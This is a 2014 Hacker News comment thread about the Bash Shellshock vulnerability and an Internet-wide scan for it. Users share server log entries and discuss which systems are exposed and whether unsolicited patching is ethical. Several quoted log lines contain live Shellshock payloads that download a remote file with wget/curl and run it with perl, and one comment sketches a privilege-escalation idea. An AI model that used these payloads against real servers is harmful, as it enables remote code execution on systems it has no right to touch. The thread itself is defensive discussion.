Hacker News new | past | comments | ask | show | jobs | submit login
Bash 'shellshock' scan of the Internet (erratasec.com)
109 points by agwa on Sept 24, 2014 | hide | past | favorite | 38 comments

I've been monitoring my Apache logs all day for the string "() {". So far Robert Graham's scan is the only match. This is what the log entry looks like: - - [24/Sep/2014:22:07:56 +0000] "GET / HTTP/1.0" 403 492 "() { :; }; ping -c 11" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"

Someone not wanting to stick out might only probe headers that are less-often logged, but still possibly passed-along as environment variables. Has anyone logged 'HTTP_FROM' in a long while?

The shellshock scan is setting the Host header, which might set the SERVER_NAME CGI variable in some environments and is not included in the Common Log Format or widely used Combined Log Format (which adds the Referer and User-Agent). For example, Apache's httpd directive UseCanonicalName is set to "off" by default, allowing the client to set SERVER_NAME via the Host header, possibly passing it to vulnerable scripts.

Furthermore, an admin might use directives to log the requested host in a name-based virtual hosting environment to facilitate parsing. For example, when using Apache's httpd LogFormat/CustomLog directives, if "%V" is used as the format string and UseCanonicalName is set to "off", the string provided by the client in the Host header will be written to the log. Naive parsers might choke on this or even execute the code. If the shellshock scan results in a delayed surge of pings from a single host, this is likely to be the cause.

Excellent point.

Apache actually passes along any HTTP header, even undefined ones, as CGI environment variables (of the form $HTTP_HEADERNAME) so an attacker could just make up a header and it would be very unlikely to be logged.

Thanks for the idea. Looks like there is someone out there already trying to download and install remote shells:

    access.log: - - [25/Sep/2014:12:30:00 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 302 169 "-" "() { :;}; /bin/ping -c 1"
    access.log: - - [26/Sep/2014:00:26:04 +0000] "GET /cgi-bin/helpme HTTP/1.0" 302 169 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget;curl -O /tmp/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\x22"
    access.log: - - [26/Sep/2014:00:26:05 +0000] "GET /cgi-bin/helpme HTTP/1.0" 404 13272 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget;curl -O /tmp/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\x22"
Any suggestions on how to best check if they succeeded? I think I'm safe as I upgraded Ubuntu Bash right after the announcement, and run Nginx+Uwsgi instead of Apache with CGI enabled. But Nginx might set some environment variables somewhere as well.

I saw a similar thing in my apache log. I shut the machine down. I will check for changed files via `find` http://xmodulo.com/how-to-find-recently-modified-files-on-li... when I get the chance.

I was scanned several times - looks like there were a few false starts and different ping commands: http://pastebin.com/badL7dtk

Ouch - that first attempt (ping without the -c option) has probably resulted in a number of long-lived ping processes.

Now, just to repeat the scan with:

  Referer: () { :; }; sudo apt-get update && sudo apt-get install --only-upgrade bash
"Why, who was that masked sysadmin? We didn't even get the chance to thank him."

Who would grant `sudo` privileges to `www-data` without asking for a password? That's just asking for a bad time.

you could prolly get around that

if their httpd.conf has incorrect privs set, you could run a script that changes the "user to run as" to root, then set up a script that would run on next reboot to apt-get upgrade and remove the root privs config line. you'd have to wait for the server to go down or reboot however long in the future, but hey it would work.

The same people who write CGI applications in bash?

Your CGI application does not need to be written in bash for you to be vulnerable. If at any point your non-bash CGI program (and this includes PHP, even with mod_php, since it sets the same environment variables), or one of its descendant processes, executes a bash script, you can be exploited.

This is especially bad on systems where /bin/sh is /bin/bash, since /bin/sh gets invoked implicitly by system(3). So you could have a non-bash CGI program invoking a non-bash program using system(3) and you can be exploited.

According to https://access.redhat.com/articles/1200223, mod_php is not vulnerable.

You're right; thanks! I saw the HTTP_* variables in phpinfo() and assumed they'd be passed on to children through system(), but they actually aren't. In fact the only environment variables passed through look pretty innocuous.

I didn't say it required it. I simply pointed out (albeit sarcastically) that CGI scripts do get written in bash, and people often often make use of sudo within them. I've seen such a beast in production at multiple companies.

The amusing up/down vote war I am watching on my karma gives me hope that at least 50% of HN got it...

Does this qualify as white-hat or grey-hat hacking? Does the doing only good outweigh the bad of modifying someone else's system?

It's a long-running debate in the security community, almost as big as full-vs-responsible disclosure.

On the pro side, it's better than you get patched than stay vulnerable and fall into someone else's zombie list.

On the anti side, you don't know what you are messing with and could break things, oh, and it's illegal and you can go to jail.

On the anti-anti side, if you can't be held responsible to patch your machines, don't complain when someone else does it for you.

That's the barest summary.

Yikes, that redaction... even if it didn't miss digits that's a mighty small search space.

Really interested to see where the bug crops up aside from CGI scripts.

Not saying I agree with it, but personally I would be worried about prosecution from doing something like the scan he is doing.

Especially as it's actually executing code on other people's computers, you can't even really say it's just observation at that point.

The DHCP attack vector is the one that is scariest to me. We know that dhclient on Linux is vulnerable, but the number of unpatched Linux machines on a public wifi network will likely be too small to be worthwhile to try to capture. Macs on the other hand are prevalent in places like coffee shops, and Apple is notoriously slow to patch security vulnerabilities in their operating systems. Has anyone done much analysis on OS X's vulnerability to this bug?

dhcpcd-6.4.7 is not vulnerable to this issue as it sanitises variables before calling the shell.

I see you! - - [24/Sep/2014:15:04:17 -0700] "GET / HTTP/1.0" 200 62 "() { :; }; ping -c 11" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-in... - - [24/Sep/2014:17:14:58 -0700] "GET / HTTP/1.0" 200 62 "() { :; }; ping -c 11" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-in...

Now I see him - - [25/Sep/2014:07:43:58 +0300] "GET / HTTP/1.0" 200 151 "() { :; }; ping -c 11" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
..and someone else - - [25/Sep/2014:12:51:01 +0300] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1"

I just saw something from -- no idea who that is.

Saw that one two, seems its another guy doing a full scan

From Apache Log -- should I be worried -- bash not patched on OS X box. Anyone know what this does?

    "GET /cgi-bin/hi HTTP/1.0" 404 357 "-" "() { :;}; /bin/bash -c "cd /tmp;wget;curl -O /tmp/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

>Update: Someone is using masscan to deliver malware. They'll likely have compromised most of the system I've found by tomorrow morning. If they using different URLs and fix the Host field, they'll get tons more.

To be vulnerable to this I need to be running CGI scripts right? I have my system set up with reverse nginx proxies and haproxy TCP mode pass through to things like nginx static files and Node.js servers. Can he run his ping command on my servers? I am thinking not.

No, CGI is just the most obvious use of user-controlled environment variables. Other systems may also set environment variables to user-controlled strings for whatever reason. If such a system ever invokes bash, even indirectly or implicitly, with user-controlled environment variables set, that system is vulnerable.

Example non-CGI vulnerable systems from RedHat: CUPS, dhclient.

Can someone from the internet use this type of attack through CUPS or dhclient then? I was asking about external attacks, not users that are already on the system.

dhclient: sort of. If you connect to a malicious access point, or someone runs a rogue DHCP server on a network you trust, they could potentially attack dhclient.

CUPS: If you are exposing a CUPS server to the Internet to allow remote printing.

OK so are those the only ones you know of? I am going to patch but just wondering about this category of attack in a more general sense so want to make sure I understand the scope of this particular one.

So say I have a server that is running a VPN (tinc). Then another system is connected to that same VPN network. Are you saying that by running a DHCP server on the second system, my server could be compromised?

It's impossible to enumerate all evil. There's no way of knowing what else is vulnerable until it's demonstrated to be vulnerable. I've commented elsewhere, though, describing what types of function calls and programs are likely to be vulnerable.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact